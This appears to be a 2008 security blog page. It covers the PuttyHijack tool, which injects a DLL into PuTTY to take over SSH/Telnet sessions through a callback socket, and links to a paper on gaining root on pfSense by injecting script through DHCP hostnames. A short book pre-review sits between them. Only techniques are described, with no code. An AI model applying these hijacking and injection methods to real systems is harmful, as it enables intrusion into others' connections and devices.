Putty Hijack released by Insomnia Security

Brett Moore of Insomnia Security has released Putty Hijack

Link: http://www.insomniasec.com/releases/tools

From the announcement:

PuttyHijack is a POC tool that injects a dll into the Putty

process to hijack an existing, or soon to be created, connection.

This can be useful during penetration tests when a windows box that
has been compromised is used to SSH/Telnet into other servers.

The injected DLL installs some hooks and creates a socket for a
callback connection that is then used for input/output redirection.

It does not kill the current connection, and will cleanly uninject
if the socket or process is stopped.

Works as described.

Issues:
* only works if putty is already running, otherwise it has nothing to hook. So in its current state its cute but not usable.

Comments:
*what would be handy would be for the tool to run and wait for putty to start then do the hooking.
*low tech solution of just replacing the putty link with a bat file calling both putty.exe and puttyhijack thus far is not working :-(
*source is included so realistically i should shut up and just fire up visual studio


Screen shots


Pre-Review Blown To Bits: Your Life, Liberty, and Happiness After the Digital Explosion

Just a quick pre-review for Blown To Bits: Your Life, Liberty, and Happiness After the Digital Explosion. It is an excellent follow up to No Place to Hide. Its been updated, talks about current privacy issues and is thus far well written. The authors do a great job of laying out how we have given away or privacy for convenience and how the big data shops technically aren't breaking any laws which works out just fine for the government who gladly pay them to spy and aggregate data.

I should be able to finish it up on the way to vegas and hopefully will remember enough post defcon to write the review ;-)


Saturday, August 2, 2008

DHCP Script Injection

Very cool paper and demo over at MWR InfoSecurity on DHCP Script Injection.

The paper covers attacking the pfsense admin interface and injecting script into the DHCP hostname field. Because the admin interface runs as root your code is executed as root. The demo also uses a CRSF attack to change the password but I think its far more interesting to be able to inject script into the interface and run with all the exploitation options available there. They also released the tool to do it.

Full Paper
http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf

Paper on the DHCP Script Injection
http://www.mwrinfosecurity.com/publications/mwri_pfsense-dhcp-script-injection_2008-07-28.pdf

Demo
http://www.mwrinfosecurity.com/publications/pfsense.htm